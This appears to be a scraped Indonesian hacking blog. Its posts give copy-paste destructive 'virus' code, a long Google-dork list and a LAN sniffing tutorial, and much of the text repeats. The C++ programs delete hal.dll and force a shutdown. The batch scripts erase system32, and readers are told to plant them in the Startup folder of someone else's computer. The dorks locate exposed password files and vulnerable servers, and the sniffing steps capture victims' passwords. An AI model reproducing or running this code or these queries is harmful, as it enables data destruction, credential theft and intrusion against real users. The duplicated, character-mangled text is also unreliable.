KREASI PIKIRAN - Virus yang ini mungkin dikategorikan berbahaya, dikarenakan bisa menghapus file .dll dan membuat komputer tak bisa booting. Jadi hati-hati, kalau mau coba, coba di komputer yang udah mau rusak aja pissspisss.
Langkah - langkah
1. Siapkan tool C++ (Seperti dev c Portable dan yang sejenis)
2. Copy Code di bawah ini
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(îC:\\windows\\system32\\hal.dllî); //PWNAGE TIME
system(îshutdown -s -rî);
system(îPAUSEî);
return EXIT_SUCCESS;
}
3. Program ini akan menghapus hal.dll , jadi jangan dieksekusi karena bisa menyebabkan gagal booting.
4. Kalau mau yang advance, copy code di bawah ini
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(î%systemroot%\\system32\\hal.dllî); //PWNAGE TIME
system(îshutdown -s -rî);
system(îPAUSEî);
return EXIT_SUCCESS;
}
5. Perbedaan dengan kode yang pertama adalah pada proses pencarian directory system secara sistem. (Kode pertama hanya bisa menghapus kode hal.dll jika dilteakkan di directory C: , sedangkan ini akan otomatis mencari.
6. Jangan coba di komputer yang masih normal-normal muanthabbb. Coba di komputer yang kira-kira sudah rusak berat saja pissspisss.
Kalau diurutkan, Tingkat kerusakannya bisa sebagai berikut.
Virus 1 = Tidak menyebabkan apa-apa
Virus 2 = Menghabiskan Resource
Virus 3 = Bisa menghapuskan hal.dll menyebabkan gagal booting
Bagi yang mau coba, pikir-pikir dulu ya (Khususnya No.3) , kerusakan pada komputer anda ditanggung sendiri pissspisss.
Oke, sekian dulu posting kali ini, semoga bermanfaat. Update Blog ini akan diusahakan serutin mungkin, So tetaplah bersama saya dan follow blog ini agar anda tidak ketinggalan info dan pengetahuan dari blog ini.
»» Selanjutnya...
Langkah - langkah
1. Siapkan tool C++ (Seperti dev c Portable dan yang sejenis)
2. Copy Code di bawah ini
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(îC:\\windows\\system32\\hal.dllî); //PWNAGE TIME
system(îshutdown -s -rî);
system(îPAUSEî);
return EXIT_SUCCESS;
}
3. Program ini akan menghapus hal.dll , jadi jangan dieksekusi karena bisa menyebabkan gagal booting.
4. Kalau mau yang advance, copy code di bawah ini
#include
#include
using namespace std;
int main(int argc, char *argv[])
{
std::remove(î%systemroot%\\system32\\hal.dllî); //PWNAGE TIME
system(îshutdown -s -rî);
system(îPAUSEî);
return EXIT_SUCCESS;
}
5. Perbedaan dengan kode yang pertama adalah pada proses pencarian directory system secara sistem. (Kode pertama hanya bisa menghapus kode hal.dll jika dilteakkan di directory C: , sedangkan ini akan otomatis mencari.
6. Jangan coba di komputer yang masih normal-normal muanthabbb. Coba di komputer yang kira-kira sudah rusak berat saja pissspisss.
Kalau diurutkan, Tingkat kerusakannya bisa sebagai berikut.
Virus 1 = Tidak menyebabkan apa-apa
Virus 2 = Menghabiskan Resource
Virus 3 = Bisa menghapuskan hal.dll menyebabkan gagal booting
Bagi yang mau coba, pikir-pikir dulu ya (Khususnya No.3) , kerusakan pada komputer anda ditanggung sendiri pissspisss.
Oke, sekian dulu posting kali ini, semoga bermanfaat. Update Blog ini akan diusahakan serutin mungkin, So tetaplah bersama saya dan follow blog ini agar anda tidak ketinggalan info dan pengetahuan dari blog ini.
KREASI PIKIRAN - hai sobat, setelah beberapa postingan lalu yang membahas tentang membuat virus, kali ini saya akan kembali berbagi ilmu tentang membuat virus batch sederhana.
Virus yang kali ini cukup berbahaya teman, namun tidak merusak. Jika mau mencoba, silakan coba di komputer lain ya, jangan di komputer sendiri, senjata makan tuan tuh namanya nanti.
Langkah-langkah
1. Buka Notepad
2. Copy Code di bawah ini
Virus terdeteksi // Title buat window
xxx // sub skrip xxx
msg * mencoba mendelete viruz // pesan
erase "C:\WINDOWS\system32" // menghapus system32
start xxxx.bat // menjalankan file xxxx.bat yg disimpan pada folder yang sama
msg * percobaan gagal,mencoba kembali // pesan
goto xxxx // eksekusi xxxx.bat
3. Save dengan nama xxx.bat (Jadikan all file, jangan .txt)
4. Buka Notepad (Notepad baru)
5. Copy kode berikut
Viruz // mengubah window title
msg * Wah2 komputer anda kena viruz// pesan di message box
del // Delete files /// "del c:" mengapus file yg di c:
erase // sama kyk del
start xxxx.bat // memulai xxxx.bat
xxx // sub skrip
goto // ke subskrip
6. Save dengan nama xxxx.bat( Jadikan all file,,simpan di folder yg sama dengan file yang pertama)
7. Jika mau menjalankannya, jalankan yang xxxx.bat
8. Jika mau menjalankannya ketika komputer Startup Copy ke C:\Documents and Settings\*nama user*\Start Menu\Programs\Startup.
yaa, lumayan sederhana bukan teman-teman, tinggal copy deh scriptnya
semoga bisa menambah wawasan kita semua yaa, ingat jangan disalahgunakan loh.
»» Selanjutnya...
Virus yang kali ini cukup berbahaya teman, namun tidak merusak. Jika mau mencoba, silakan coba di komputer lain ya, jangan di komputer sendiri, senjata makan tuan tuh namanya nanti.
Langkah-langkah
1. Buka Notepad
2. Copy Code di bawah ini
Virus terdeteksi // Title buat window
xxx // sub skrip xxx
msg * mencoba mendelete viruz // pesan
erase "C:\WINDOWS\system32" // menghapus system32
start xxxx.bat // menjalankan file xxxx.bat yg disimpan pada folder yang sama
msg * percobaan gagal,mencoba kembali // pesan
goto xxxx // eksekusi xxxx.bat
3. Save dengan nama xxx.bat (Jadikan all file, jangan .txt)
4. Buka Notepad (Notepad baru)
5. Copy kode berikut
Viruz // mengubah window title
msg * Wah2 komputer anda kena viruz// pesan di message box
del // Delete files /// "del c:" mengapus file yg di c:
erase // sama kyk del
start xxxx.bat // memulai xxxx.bat
xxx // sub skrip
goto // ke subskrip
6. Save dengan nama xxxx.bat( Jadikan all file,,simpan di folder yg sama dengan file yang pertama)
7. Jika mau menjalankannya, jalankan yang xxxx.bat
8. Jika mau menjalankannya ketika komputer Startup Copy ke C:\Documents and Settings\*nama user*\Start Menu\Programs\Startup.
yaa, lumayan sederhana bukan teman-teman, tinggal copy deh scriptnya
semoga bisa menambah wawasan kita semua yaa, ingat jangan disalahgunakan loh.
KREASI PIKIRAN - Sebuah pepatah "Tiada Gading yang Tak Retak" memang sangat cocok untuk
diterapkan ke dalam segala hal di dunia ini. Dunia IT pun tak terlepas
dari pepatah tersebut dan salah satunya adalah sistem operasi paling
terkenal di dunia saat ini, yaitu: "Windows" milik Microsoft. Di bawah
ini, terdapat beberapa keanehan pada sistem operasi fenomenal tersebut.
Mungkin beberapa di antara anda sudah mengetahuinya, tapi tak ada salahnya
untuk mencoba bukan?
MAGIC #1
Orang India menemukan bahwa tidak ada seorang pun yang dapat membuat
FOLDER di komputer dengan program Microsoft manapun dengan judul folder
"CON". Ini merupakan hal nyata dan seluruh kru Microsoft sendiri tidak
dapat menjawabnya kenapa hal ini bisa terjadi. Cobalah dengan membuat
sebuah folder dengan nama CON atau con.Tapi (atau mungkin sengaja???)
Sebenarnya kru Microsof bisa menjelaskan ini. Karena hal ini berhubungan dengan system numerik jaman dulu (DOS system). Cobalah nama berikut:
PRN
AUX
NUL
LPT1
COM1
Potential drive letter - A: to Z:
A number of others
Bukalah My Document -> File -> New -> Folder -> ketik CON atau Con atau con
Apa yang terjadi?
MAGIC #2
Bagi anda para pengguna Windows, lakukanlah hal berikut ini:
1) Buka sebuah notepad file kosong
2) Ketiklah "Bush hid the facts" (tanpa tanda kutip ya)
3) Save di mana pun anda suka
4) Tutuplah dan bukalah kembali file tersebut.
Aneh bukan?
Tapi sebenarnya ini berhubungan "generate" notepad sendiri.. ("ANSI")
NB: adanya hal ini membuktikan masih ada celah,yang sukar diperbaiki. Dan dengan statemen seperti ini, kita bisa jadi provokator yang handal.....
Tapi error ini tidak berlaku untuk windows tipe lama...
MAGIC #3: Microsoft Crazy Facts
Cobalah hal yang menarik ini, sungguh aneh! Bahkan Bill Gates sendiri
tidak menemukan jawabannya kenapa ini bisa terjadi! Hal ini ditemukan oleh
orang Brazil. Cobalah!
1)Buka program Microsoft Word dan ketik: =rand (200, 99)
2) kemudian anda ENTER
Apa yang anda temukan? Menarik bukan? coba aja.....
Nb: tapi sebenarnya ini system default,look this example;
=rand(1) inserts one five-sentence paragraph of text
=rand(1,1) inserts one one-sentence paragraph of text.
=rand(1,2) inserts one two-sentence paragraph of text
=rand(2) inserts two five-sentence paragraphs of text
=rand(2,1) inserts two one-sentence paragraphs of text
=rand(10) inserts 10 five-sentence paragraphs of text
=rand(10,1) inserts 10 one-sentence paragraphs of text
=rand(10,10) inserts 10 ten-sentence paragraphs of text
To view the paragraph marks (∂) in your Word document, do one of the following: On the Standard toolbar, click Show/Hide (∂).
On the Tools menu, click Options. On the View tab, click to select the All check box, and then click OK
gimana, aneh-aneh bukan yang ada pada Sistem Operasi sekelas windows yang hampir penggunanya diseluruh dunia??
»» Selanjutnya...
diterapkan ke dalam segala hal di dunia ini. Dunia IT pun tak terlepas
dari pepatah tersebut dan salah satunya adalah sistem operasi paling
terkenal di dunia saat ini, yaitu: "Windows" milik Microsoft. Di bawah
ini, terdapat beberapa keanehan pada sistem operasi fenomenal tersebut.
Mungkin beberapa di antara anda sudah mengetahuinya, tapi tak ada salahnya
untuk mencoba bukan?
MAGIC #1
Orang India menemukan bahwa tidak ada seorang pun yang dapat membuat
FOLDER di komputer dengan program Microsoft manapun dengan judul folder
"CON". Ini merupakan hal nyata dan seluruh kru Microsoft sendiri tidak
dapat menjawabnya kenapa hal ini bisa terjadi. Cobalah dengan membuat
sebuah folder dengan nama CON atau con.Tapi (atau mungkin sengaja???)
Sebenarnya kru Microsof bisa menjelaskan ini. Karena hal ini berhubungan dengan system numerik jaman dulu (DOS system). Cobalah nama berikut:
PRN
AUX
NUL
LPT1
COM1
Potential drive letter - A: to Z:
A number of others
Bukalah My Document -> File -> New -> Folder -> ketik CON atau Con atau con
Apa yang terjadi?
MAGIC #2
Bagi anda para pengguna Windows, lakukanlah hal berikut ini:
1) Buka sebuah notepad file kosong
2) Ketiklah "Bush hid the facts" (tanpa tanda kutip ya)
3) Save di mana pun anda suka
4) Tutuplah dan bukalah kembali file tersebut.
Aneh bukan?
Tapi sebenarnya ini berhubungan "generate" notepad sendiri.. ("ANSI")
NB: adanya hal ini membuktikan masih ada celah,yang sukar diperbaiki. Dan dengan statemen seperti ini, kita bisa jadi provokator yang handal.....
Tapi error ini tidak berlaku untuk windows tipe lama...
MAGIC #3: Microsoft Crazy Facts
Cobalah hal yang menarik ini, sungguh aneh! Bahkan Bill Gates sendiri
tidak menemukan jawabannya kenapa ini bisa terjadi! Hal ini ditemukan oleh
orang Brazil. Cobalah!
1)Buka program Microsoft Word dan ketik: =rand (200, 99)
2) kemudian anda ENTER
Apa yang anda temukan? Menarik bukan? coba aja.....
Nb: tapi sebenarnya ini system default,look this example;
=rand(1) inserts one five-sentence paragraph of text
=rand(1,1) inserts one one-sentence paragraph of text.
=rand(1,2) inserts one two-sentence paragraph of text
=rand(2) inserts two five-sentence paragraphs of text
=rand(2,1) inserts two one-sentence paragraphs of text
=rand(10) inserts 10 five-sentence paragraphs of text
=rand(10,1) inserts 10 one-sentence paragraphs of text
=rand(10,10) inserts 10 ten-sentence paragraphs of text
To view the paragraph marks (∂) in your Word document, do one of the following: On the Standard toolbar, click Show/Hide (∂).
On the Tools menu, click Options. On the View tab, click to select the All check box, and then click OK
gimana, aneh-aneh bukan yang ada pada Sistem Operasi sekelas windows yang hampir penggunanya diseluruh dunia??
KREASI PIKIRAN - Ternyata selain sebagai Search Engine, Google juga merupakan hacking tool paling mutakhir, untuk lebih lengkapnya langsung saja teman :
Tools berbahaya dari Google
Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya loh se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua.
dari tutorial ini yang akan didapatkan adalah:
* Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya
* Bagaimana cara mencari informasi tentang vulnerable systems and Web services
* Bagaimana cara mencari publicly available network devices.
Hal pertama dari yang harus di ketahui adalah Google Query Operators
Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contong nya.
site
memfilter berdasarkan domain yang ada
contoh: site:google.com fox > akan mencari kata fox di situs google.com
intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire > akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire
allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire > akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire
inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire > akan mencari kata fire di website yang url nya terdapat fox
allinurl
Sama dengan Allintitle (hanya ini url)
filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire > akan mencari file PDF yang didalamnya terdapat kata fire
contoh keren: filetype:doc skripsi IT
numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire ó> akan mencari range 1-100 yang terdapat kata fire
link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com > akan mencari site site mana aja yang memiliki links ke google.com
inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire > akan mencari web yang memiliki deskripsi fire
kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * - + ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )
nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database
Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
Apache/1.3.28 Server at intitle:index.of > Apache 1.3.28
Apache/2.0 Server at intitle:index.of > Apache 2.0
Apache/* Server at intitle:index.of > semua versi dari Apache
Microsoft-IIS/4.0 Server at intitle:index.of > Microsoft Internet Information Services 4.0
Microsoft-IIS/5.0 Server at intitle:index.of > Microsoft Internet Information Services 5.0
Microsoft-IIS/6.0 Server at intitle:index.of > Microsoft Internet Information Services 6.0
Microsoft-IIS/* Server at intitle:index.of > semua versi dari Microsoft Internet Information Services
Oracle HTTP Server/* Server at intitle:index.of > semua versi dari Oracle HTTP Server
IBM _ HTTP _ Server/* * Server at intitle:index.of > semua versi dari IBM HTTP Server
Netscape/* Server at intitle:index.of > semua versi dari Netscape Server
Red Hat Secure/* intitle:index.of > semua versi dari the Red Hat Secure server
HP Apache-based Web Server/* intitle:index.of > semua versi dari the HP server
Beberapa Bug pada Skripts dapat ditemukan google:
Generated by phpSystem > dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points
This summary was generated by wwwstat > web server statistics, system file structure
These statistics were produced by getstats >web server statistics, system file structure
This report was generated by WebLog >web server statistics, system file structure
intext:Tobias Oetiker traffic analysis >system performance statistics as MRTG charts, network configuration
intitle:Apache::Status (inurl:server-status | inurl:status.html | inurl:apache.html)
>server version, operating system type, child process list,current connections
intitle:ASP Stats Generator *.* >ASP Stats
Generator 2003-2004 weppos >web server activity, lots of visitor information
intitle:Multimon UPS status page >UPS device performance statistics
intitle:statistics of advanced web statistics >web server statistics, visitor information
intitle:System Statistics +System and Network Information Center >system performance statistics as MRTG charts, hardware configuration, running services
intitle:Usage Statistics forî\ Generated by Webalizer >web server statistics, visitor information, system file structure
intitle:Web Server Statistics for **** >web server statistics, visitor information
inurl:/axs/ax-admin.pl -script
>web server statistics, visitor information
inurl:/cricket/grapher.cgi
>MRTG charts of network interface performance
inurl:server-info Apache Server Information
>web server version and configuration, operating system type, system file structure
Output produced by SysWatch *
>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs
Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.
A syntax error has occurred filetype:html
>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords
Access denied for user Using password
>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code
The script whose uid is is not allowed to access
>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information
ORA-00921: unexpected end of SQL command
>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information
error found handling the request cocoon filetype:xml
>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information
Invision Power Board Database Error
>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code
Warning: mysql _ query() invalid query
>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information
Error Message : Error loading required libraries.
>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information
#mysql dump filetype:sql
>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents
Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google
http://*:*@www
site passwords for site, stored as the string
http://username: password@www filetype:bak inurl:htaccess|passwd|shadow|ht users
file backups, berpotensial untuk mengambil user names and passwords
filetype:mdb inurl:account|users|admin|administrators|passwd|password
mdb files, berpotensial untuk mengambil password information
intitle:Index of pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup
Index of/ Parent Directory WS _ FTP.ini filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords
ext:pwd inurl:(service|authors|administrators|users) # -FrontPage-
Terdapat Microsoft FrontPage passwords
filetype:sql (passwd values **** |password values **** | pass values **** )
Terdapat SQL code and passwords yang disimpan dalam a database
intitle:index.of trillian.ini
configuration files for the Trillian IM
eggdrop filetype:user
user configuration files for the Eggdrop ircbot
filetype:conf slapd.conf configuration files for OpenLDAP
inurl:wvdial.conf intext:password configuration files for WV Dial
ext:ini eudora.ini configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information
intext:powered by Web Wiz Journal
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file ñ just enter http:///journal/journal.mdb instead of the default http:///journal/
Powered by DUclassified -site:duware.com
Powered by DUcalendar -site:duware.com
Powered by DUdirectory -site:duware.com
Powered by DUclassmate -site:duware.com
Powered by DUdownload -site:duware.com
Powered by DUpaypal -site:duware.com
Powered by DUforum -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
ñ untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/
intext:BiTBOARD v2.0? BiTSHiFTERS Bulletin Board
website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php
Mencari Dokumen khusus ?
filetype:xls inurl:email.xls email.xls
files, berpotensial untuk mengambil contact information
phone * * * address * e-mail intitle:curriculum vitae
CVs
not for distribution
confidential documents containing the confidential clause
buddylist.blt
AIM contacts list
intitle:index.of mystuff.xml
Trillian IM contacts list
filetype:ctt msn
MSN contacts list
filetype:QDF
QDF database files for the Quicken financial application
intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers
intitle:Index Of -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail
Network Vulnerability Assessment Report
Host Vulnerability Summary Report
filetype:pdf ìAssessment Report
This file was generated by Nessus
reports for network security scans, penetration tests etc. On the Net
nah, untuk lebih berkreasi, bisa dicoba sendiri
sekian dari saya, terima kasih teman-teman semua yang telah mampir di blog ini
»» Selanjutnya...
Tools berbahaya dari Google
Diam diam, site ini memberikan kita tools untuk melakukan hacking yang paling berbahaya loh se antero dunia, walaupun tools google ini hanya bisa memberikan sampai ke level footprinting ada juga yang bisa sampai ke level selanjutnya. kenapa aku sebut dengan tools ? karna kita menggunakan google untuk mencari media yang unsecure, yang mudah di hack yang bolong, yang belum ter update, karna google memiliki kekuatan untuk itu semua.
dari tutorial ini yang akan didapatkan adalah:
* Bagaimana cara menggunakan google untuk mencari sources dari personal information dan confidential data lainya
* Bagaimana cara mencari informasi tentang vulnerable systems and Web services
* Bagaimana cara mencari publicly available network devices.
Hal pertama dari yang harus di ketahui adalah Google Query Operators
Query operator ini berfungsi kasar sebagai filtering search nya google menjadi lebih spesifik berdasarkan query yang kita inginkan, masing masing query memiliki fungsi sendiri sendiri. berikut keterangan dan contong nya.
site
memfilter berdasarkan domain yang ada
contoh: site:google.com fox > akan mencari kata fox di situs google.com
intitle
Memfilter dokumen yang memiliki title yang spesifik
contoh: intitle:fox fire > akan mencari semua site yang ada kata fox dan didalamnya terdapat teks fire
allintitle
Memfilter dokumen untuk mencari intitle intile
contoh: allintitle:fox fire > akan mencari semua site yang memiliki title fox dan yang memiliki title fire atau = intitle:fox intitle:fire
inurl
Memfilter pencarian dengan url yang spesifik
contoh: inurl:fox fire > akan mencari kata fire di website yang url nya terdapat fox
allinurl
Sama dengan Allintitle (hanya ini url)
filetype, ext
Memfilter pencarian untuk dokumen yang spesifik
contoh: filetype:pdf fire > akan mencari file PDF yang didalamnya terdapat kata fire
contoh keren: filetype:doc skripsi IT
numrange
Memfilter dokumen berdasarkan range tertentu
contoh: numrange:1-100 fire ó> akan mencari range 1-100 yang terdapat kata fire
link
Memfilter site site yang memiliki link terhadap site tertentu
contoh: link:www.google.com > akan mencari site site mana aja yang memiliki links ke google.com
inanchor
Memfilter berdasarkan site description yang ada
contoh: inanchor:fire > akan mencari web yang memiliki deskripsi fire
kira kira itulah query query google yang keren keren, sisanya ada sih, seperti:
/ * - + ( ya ini regular ekspression biasa kan, jadi ngga perlu di jelaskan lebih detail )
nah, dari situ, kia bisa kreasikan ke berbagai macam jenis query untuk memfilter sesuatu, bahkan ke sesuatu yang lebih dalam, misalnya file database
Web Server
untuk mencari target dengan mudah dilakukan google dengan menggunakan sintaks berikut ini:
Apache/1.3.28 Server at intitle:index.of > Apache 1.3.28
Apache/2.0 Server at intitle:index.of > Apache 2.0
Apache/* Server at intitle:index.of > semua versi dari Apache
Microsoft-IIS/4.0 Server at intitle:index.of > Microsoft Internet Information Services 4.0
Microsoft-IIS/5.0 Server at intitle:index.of > Microsoft Internet Information Services 5.0
Microsoft-IIS/6.0 Server at intitle:index.of > Microsoft Internet Information Services 6.0
Microsoft-IIS/* Server at intitle:index.of > semua versi dari Microsoft Internet Information Services
Oracle HTTP Server/* Server at intitle:index.of > semua versi dari Oracle HTTP Server
IBM _ HTTP _ Server/* * Server at intitle:index.of > semua versi dari IBM HTTP Server
Netscape/* Server at intitle:index.of > semua versi dari Netscape Server
Red Hat Secure/* intitle:index.of > semua versi dari the Red Hat Secure server
HP Apache-based Web Server/* intitle:index.of > semua versi dari the HP server
Beberapa Bug pada Skripts dapat ditemukan google:
Generated by phpSystem > dapat menemukan operating system type and version, hardware configuration, logged users, open connections, free memory dan disk space, mount points
This summary was generated by wwwstat > web server statistics, system file structure
These statistics were produced by getstats >web server statistics, system file structure
This report was generated by WebLog >web server statistics, system file structure
intext:Tobias Oetiker traffic analysis >system performance statistics as MRTG charts, network configuration
intitle:Apache::Status (inurl:server-status | inurl:status.html | inurl:apache.html)
>server version, operating system type, child process list,current connections
intitle:ASP Stats Generator *.* >ASP Stats
Generator 2003-2004 weppos >web server activity, lots of visitor information
intitle:Multimon UPS status page >UPS device performance statistics
intitle:statistics of advanced web statistics >web server statistics, visitor information
intitle:System Statistics +System and Network Information Center >system performance statistics as MRTG charts, hardware configuration, running services
intitle:Usage Statistics forî\ Generated by Webalizer >web server statistics, visitor information, system file structure
intitle:Web Server Statistics for **** >web server statistics, visitor information
inurl:/axs/ax-admin.pl -script
>web server statistics, visitor information
inurl:/cricket/grapher.cgi
>MRTG charts of network interface performance
inurl:server-info Apache Server Information
>web server version and configuration, operating system type, system file structure
Output produced by SysWatch *
>operating system type and version, logged users, free memory and disk space, mount points, running processes,system logs
Error message queries
Salah satu kumpulan error message query, dapat ditemukan sehingga kita bisa mulai melakukan hacking pada tahap selanjutnya.
A syntax error has occurred filetype:html
>Informix database errors, berpotensial untuk mengambil function names, filenames, file structure information, pieces of SQL code and passwords
Access denied for user Using password
>authorisation errors, berpotensial untuk mengambil user names, function names, file structure information and pieces of SQL code
The script whose uid is is not allowed to access
>access-related PHP errors, berpotensial untuk mengambil filenames, function names and file structure information
ORA-00921: unexpected end of SQL command
>Oracle database errors, berpotensial untuk mengambil filenames, function names and file structure information
error found handling the request cocoon filetype:xml
>Cocoon errors, berpotensial untuk mengambil Cocoon version information, filenames, function names and file structure information
Invision Power Board Database Error
>Invision Power Board bulletin board errors, berpotensial untuk mengambil function names, filenames, file structure information and piece of SQL code
Warning: mysql _ query() invalid query
>MySQL database errors, berpotensial untuk mengambil user names, function names, filenames and file structure information
Error Message : Error loading required libraries.
>CGI script errors, berpotensial untuk mengambil information about operating system and program versions, user names, filenames and file structure information
#mysql dump filetype:sql
>MySQL database errors, berpotensial untuk mengambil informasi database structure dan contents
Google queries untuk mencari lokasi passwords
kumpulan secara garis besar lokasi password sebuah sistem yang dapat diakses oleh google
http://*:*@www
site passwords for site, stored as the string
http://username: password@www filetype:bak inurl:htaccess|passwd|shadow|ht users
file backups, berpotensial untuk mengambil user names and passwords
filetype:mdb inurl:account|users|admin|administrators|passwd|password
mdb files, berpotensial untuk mengambil password information
intitle:Index of pwd.db
pwd.db files, berpotensial untuk mengambil user names and encrypted passwords
inurl:admin inurl:backup intitle:index.of
directories whose names contain the words admin and backup
Index of/ Parent Directory WS _ FTP.ini filetype:ini WS _ FTP PWD
WS_FTP configuration files, berpotensial untuk mengambil FTP server access passwords
ext:pwd inurl:(service|authors|administrators|users) # -FrontPage-
Terdapat Microsoft FrontPage passwords
filetype:sql (passwd values **** |password values **** | pass values **** )
Terdapat SQL code and passwords yang disimpan dalam a database
intitle:index.of trillian.ini
configuration files for the Trillian IM
eggdrop filetype:user
user configuration files for the Eggdrop ircbot
filetype:conf slapd.conf configuration files for OpenLDAP
inurl:wvdial.conf intext:password configuration files for WV Dial
ext:ini eudora.ini configuration files for the Eudora mail client
filetype:mdb inurl:users.mdb
Microsoft Access files, berpotensial untuk mengambil user account information
intext:powered by Web Wiz Journal
websites using Web Wiz Journal, which in its standard configuration allows access to the passwords file ñ just enter http:///journal/journal.mdb instead of the default http:///journal/
Powered by DUclassified -site:duware.com
Powered by DUcalendar -site:duware.com
Powered by DUdirectory -site:duware.com
Powered by DUclassmate -site:duware.com
Powered by DUdownload -site:duware.com
Powered by DUpaypal -site:duware.com
Powered by DUforum -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
ñ untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/
intext:BiTBOARD v2.0? BiTSHiFTERS Bulletin Board
website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php
Mencari Dokumen khusus ?
filetype:xls inurl:email.xls email.xls
files, berpotensial untuk mengambil contact information
phone * * * address * e-mail intitle:curriculum vitae
CVs
not for distribution
confidential documents containing the confidential clause
buddylist.blt
AIM contacts list
intitle:index.of mystuff.xml
Trillian IM contacts list
filetype:ctt msn
MSN contacts list
filetype:QDF
QDF database files for the Quicken financial application
intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers
intitle:Index Of -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail
Network Vulnerability Assessment Report
Host Vulnerability Summary Report
filetype:pdf ìAssessment Report
This file was generated by Nessus
reports for network security scans, penetration tests etc. On the Net
nah, untuk lebih berkreasi, bisa dicoba sendiri
sekian dari saya, terima kasih teman-teman semua yang telah mampir di blog ini
KREASI PIKIRAN - Selamat sore teman-teman dan para blogger sekalian, kali ini blog kreasi pikiran akan berbagi ilmu mengenai Hacking Via LAN...
»» Selanjutnya...
Penasaran??
Langsung saja deh ke caranya :
Langkah Pertama :
1. Cek tipe jaringan anda, anda ada di jaringan switch / hub. Jika anda berada di jaringan hub bersyukurlah karena proses hacking anda akan jauh lebih mudah.
2. Download program-program yang dibutuhkan yaitu Wireshark dan Cain&Abel.
Code:
http://www.wireshark.org/download.html
http://www.oxid.it/cain.html
Cara Menggunakan WireShark:
* Jalankan program wireshark
* Tekan tombol Ctrl+k (klik capture lalu option)
* Pastikan isi pada Interfacenya adalah Ethernet Card anda yang menuju ke jaringan, bila bukan ganti dan pastikan pula bahwa Capture packets in promiscuous mode on
* Klik tombol start
* Klik tombol stop setelah anda merasa yakin bahwa ada password yang masuk selama anda menekan tombol start
* Anda bisa melihat semua jenis packet yang masuk dan keluar di jaringan (atau pada komputer anda saja jika network anda menggunakan Swtich
* Untuk menganalisis datanya klik kanan pada data yang ingin di analisis lalu klik Follow TCP Stream dan selamat menganalisis paketnya (saya tidak akan menjelaskan caranya karena saya tidak bisa )
* Yang jelas dari data itu pasti di dalamnya terdapat informasi2 yang dimasukkan korban ke website dan sebaliknya
Cara di atas hanya berlaku apabila jaringan anda adalah Hub bukan switch
